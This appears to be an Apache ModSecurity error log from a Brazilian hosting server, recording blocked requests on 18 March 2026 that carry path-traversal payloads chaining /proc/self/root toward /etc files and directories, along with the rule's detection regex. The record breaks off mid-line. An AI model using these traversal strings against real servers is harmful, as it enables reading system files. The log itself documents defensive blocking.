[Wed Mar 18 09:12:03.798340 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:46898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWkymAPhZkrhU8w4ldagAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:04.517091 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:60314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWlPu8EFLIOrSqIpv1HgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:05.130649 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:46900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWleyqAr6etmhZHNquawAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:08.159171 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:46904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWmMdf6f5d65gmYZTElwAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:10.589657 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:46660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWmgkwaGbbGflqUZAAhQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:11.415915 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:33414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWm-yqAr6etmhZHNqucgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:11.834052 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:46668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWm9Y0UrI5A3LftIyTLgAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:12.683690 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:56268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWnEzinOy1jxa1j4cD9wAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:14.502185 2026] [mime_magic:error] [pid 31803:tid 140411565680384] (70014)End of file found: [client 57.141.18.76:43694] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:12:14.535029 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:46678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWnimAPhZkrhU8w4ldcAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:15.830858 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:46680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWnymAPhZkrhU8w4ldcgAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:18.237233 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.241.31:46694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWoimAPhZkrhU8w4lddAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:19.525234 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:34336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWo8df6f5d65gmYZTEnAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:22.923893 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:34340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWpvu8EFLIOrSqIpv1KwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:25.290139 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:34356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWqcdf6f5d65gmYZTEnwAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:33.852213 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:56284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWsda6ubjKNq_cu4aIqwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:36.025882 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:54030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWs9a6ubjKNq_cu4aIrgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:37.448476 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:54036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWtfu8EFLIOrSqIpv1NgAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:43.133603 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:54038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWuwkwaGbbGflqUZAAlwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:12:59.186527 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:34366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWy_u8EFLIOrSqIpv1TQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:00.465928 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:59904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWzAkwaGbbGflqUZAAnwAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:02.887477 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:59906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWzkzinOy1jxa1j4cEEAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:04.203393 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:59918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqW0NY0UrI5A3LftIyTWAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:13:07.906243 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:52244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 